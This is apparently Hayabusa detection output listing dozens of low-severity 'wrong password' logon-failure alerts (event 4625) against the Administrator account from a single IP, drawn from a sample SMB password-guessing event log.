2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Blruxd110NvZjof | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0VsPitzItsjU3Y59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HEq6vk4nTe3weSOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lE8kvmcQtCmlsqtT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXmfjxrGC3liZ2oh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72JLcUBrhOoXPLzD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sRoFpK2ZvBYy4jGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9KReiI3k2WIKpxFq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsfSzPbji6ARhU0k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axeCxygvJ4zL4Xoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y64sc51Y7vbiFTIQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o395tRQcfRBTTCSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1R4wlYWS4SkM3dF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsZy0Yjvk720Mu22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RusStjhReKBmS0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eJuPYLTcGaGvErLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: raCbua01mzU1Djuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fnt8atAbMtxXivUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: psokvQJyMn5m5rMh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wTPGqOITsOhpTgIF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xxhGrLzhwNziihc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UIb1lHuPaC62UlBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2uvXuLIR9yvmWngF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MI35CCybjNtntfwo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GTJfOkk0fUC5YCX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jk6PsiAiLPsHGUh1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KeGDMp9My5eLJz55 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BvDQphjvwOCsNQqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJhad4aocvPMYVP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJl3XqTUxvqiKKaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1fAJDfguuoNxWiR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daAeGcsqoqERsEu6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0iynnwxS8v4C5b3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2kU7IS4XCvgRpTff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MBC8AJXBQHrCMrO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NSGraDQmI4MAq9Ls | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7u2Pb9y8hB0iYWh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A657rbd6k4AD7M4i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7rkiDUBuTCU2jDXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jjsCFTQoobrkQoWF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dNXav95nZyBhVOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yeq1x56Ct6R2Nu3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pUwyCNtwydEQu2bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bX7eihAOk3PUgbwM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPXqAsaYaXEr8I9L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4SaEmIpmlH1VMDun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3Dvp43a2h7Mzx2H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g3voKlRXc7rIaIYs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GF1Q5OhCLRAi96mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: caHe4iY2CQoiumQI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJi6UAm6Pp6eax8Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EW0t2wapD8yniO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PnaITXTihpB0stwx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tdBVoa82WKEAW2ce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BelKzJrEjGIcU2dN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ujeb7fRHPGCGmFm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Czwt7KF2sQHemwdJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LQQ4nNpbfKKVCJZH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6jwIc6e0AHAhXKK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nld9Job0Ll1Fgtmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9sS6i9iU3PXhokz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heaYv6Np8swhoVc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7rzgNBtUJkS93pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh45suNQ09FzPBjd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BOnwAGxxz994k6Ee | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L26mvUKOgGptcKaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aqldRjcLl8KFZr5h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ycNPBtmRHShPOcRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ISlMGsVvXry0rbju | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MjGjh70EQ5YVGJUt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yaYM5N2kuvuRCHRU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 32wgj2t7BLBviVxd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vr1kMRxLEaCIWIbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4PHEJyKgp5wXRtBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
